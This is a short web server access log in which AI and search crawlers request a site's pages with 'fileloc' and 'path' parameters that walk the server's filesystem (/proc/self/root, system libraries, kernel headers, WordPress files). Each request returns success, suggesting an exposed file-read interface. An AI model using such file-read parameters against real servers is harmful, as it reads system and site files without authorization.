216.73.216.50 - - [09/Nov/2025:01:14:16 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2F3264%2Froot%2Flib%2Fpython3.8%2Flogging%2F__init__.py&path=%2F%2Fproc%2F3264%2Froot%2Flib%2Fpython3.8%2Flogging HTTP/1.0" 200 23549 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:14:16 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F3264%2Froot%2Fusr%2Flib%2Fpython3.8%2F__pycache__%2Fnetrc.cpython-38.pyc&path=%2F%2Fproc%2F3264%2Froot%2Fusr%2Flib%2Fpython3.8%2F__pycache__ HTTP/1.0" 200 2885 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [09/Nov/2025:01:14:16 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory14/node0/cpu0 HTTP/1.0" 200 3649 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:14:16 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Fdrivers%2Fclk%2Fmxs HTTP/1.0" 200 3198 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [09/Nov/2025:01:14:17 +0000] "GET /q-~14yc0cDewLKeOv2VfcvZdQF6jhqQAuNx34931/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:14:17 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Fdrivers%2Fbus HTTP/1.0" 200 3310 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:14:18 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fx86_64-linux-gnu%2Flibsgutils2.so.2&path=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fx86_64-linux-gnu HTTP/1.0" 200 2884 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:14:18 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fsystemd%2Fsystem%2Fsysinit.target.wants%2Fsystemd-sysctl.service&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fsystemd%2Fsystem%2Fsysinit.target.wants HTTP/1.0" 200 3290 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:14:18 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fusr%2Fshare%2Fvim%2Fvim81%2Fftplugin%2Fsysctl.vim&path=%2F%2Fusr%2Fshare%2Fvim%2Fvim81%2Fftplugin HTTP/1.0" 200 3124 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:14:19 +0000] "GET /our-works/tvc-mailand-hoang-dong?fileloc=%2Fvar%2Fwww%2Flamphim%2Fdata%2Fwww%2Flamphimquangcao.net%2Fwp-admin%2Fuser%2Fcontribute.php&path=%2Fvar%2Fwww%2Flamphim%2Fdata%2Fwww%2Flamphimquangcao.net%2Fwp-admin%2Fuser HTTP/1.0" 200 3043 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
3.93.98.99 - - [09/Nov/2025:01:14:19 +0000] "GET /our-works/intracom-riverside/?path=//sys/module/async_memcpy HTTP/1.0" 200 3502 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.50 - - [09/Nov/2025:01:14:19 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F3264%2Froot%2Flib%2Fmodules%2F5.4.0-216-generic%2Fbuild%2Finclude%2Flinux%2Fplatform_data%2Fbd6107.h&path=%2F%2Fproc%2F3264%2Froot%2Flib%2Fmodules%2F5.4.0-216-generic%2Fbuild%2Finclude%2Flinux%2Fplatform_data HTTP/1.0" 200 3081 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
